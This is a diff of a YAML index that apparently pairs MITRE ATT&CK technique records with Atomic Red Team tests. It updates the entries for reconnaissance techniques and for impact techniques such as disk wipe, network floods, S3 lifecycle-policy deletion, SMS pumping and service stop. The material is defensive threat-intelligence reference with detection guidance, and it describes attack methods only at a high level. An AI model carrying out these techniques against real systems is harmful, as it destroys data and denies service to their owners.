-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -93450,19 +94115,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -93520,7 +94207,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -93541,7 +94227,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -93557,8 +94243,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -93584,7 +94268,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -93600,8 +94284,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -93625,7 +94307,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -93647,13 +94329,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -93745,13 +94425,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -93760,7 +94439,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -93777,17 +94455,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -93812,7 +94485,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -93850,7 +94524,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -93884,12 +94558,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -93954,42 +94626,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+  T1485.001:
+    technique:
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -94000,13 +94757,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -94014,12 +94778,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -94080,109 +94865,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -94191,10 +94946,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -94205,9 +94964,32 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests:
     - name: Windows - Stop service using Service Controller
@@ -94275,32 +95057,7 @@ impact:
         name: command_prompt
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
